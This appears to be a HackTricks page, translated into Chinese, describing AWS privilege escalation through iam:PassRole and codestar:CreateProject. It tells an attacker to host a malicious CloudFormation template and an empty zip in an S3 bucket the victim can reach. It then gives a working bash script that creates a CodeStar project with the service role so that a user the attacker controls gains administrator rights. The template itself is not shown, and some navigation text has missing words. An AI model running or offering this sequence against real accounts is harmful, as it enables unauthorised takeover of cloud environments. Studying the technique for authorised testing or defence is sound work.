iam:PassRole, codestar:CreateProject

学习与实践 AWS 黑客技术：学习与实践 GCP 黑客技术：

支持 HackTricks

查看 !
加入 💬 或或关注我们的 Twitter 🐦 .
通过向 和 github 仓库提交 PR 来分享黑客技巧。

通过这些权限，您可以 滥用 codestar IAM 角色 来通过 cloudformation 模板 执行 任意操作。

要利用此漏洞，您需要创建一个 可从被攻击账户访问的 S3 存储桶。上传一个名为 toolchain.json 的文件。该文件应包含 cloudformation 模板漏洞。以下内容可用于将托管策略设置为您控制的用户，并 授予其管理员权限：

还要上传这个 empty zip 文件到 bucket：

请记住，包含这两个文件的 bucket 必须可以被受害者账户访问。

上传完这两样东西后，您现在可以继续进行利用，创建一个 codestar 项目：

支持 HackTricks

Previouscodestar:CreateProject, codestar:AssociateTeamMember NextAWS - Cloudformation Privesc

Last updated 3 days ago

PROJECT_NAME="supercodestar" # Crecte the source JSON ## In this JSON the bucket and key (path) to the empry.zip file is used SOURCE_CODE_PATH="/tmp/surce_code.json" SOURCE_CODE="[ { \"source\": { \"s3\": { \"bucketName\": \"privesc\", \"bucketKey\": \"empty.zip\" } }, \"destination\": { \"codeCommit\": { \"name\": \"$PROJECT_NAME\" } } } ]" printf "$SOURCE_CODE" > $SOURCE_CODE_PATH # Create the toolchain JSON ## In this JSON the bucket and key (path) to the toolchain.json file is used TOOLCHAIN_PATH="/tmp/tool_chain.json" TOOLCHAIN="{ \"source\": { \"s3\": { \"bucketName\": \"privesc\", \"bucketKey\": \"toolchain.json\" } }, \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" }" printf "$TOOLCHAIN" > $TOOLCHAIN_PATH # Create the codestar project that will use the cloudformation epxloit to privesc aws codestar create-project \ --name $PROJECT_NAME \ --id $PROJECT_NAME \ --source-code file://$SOURCE_CODE_PATH \ --toolchain file://$TOOLCHAIN_PATH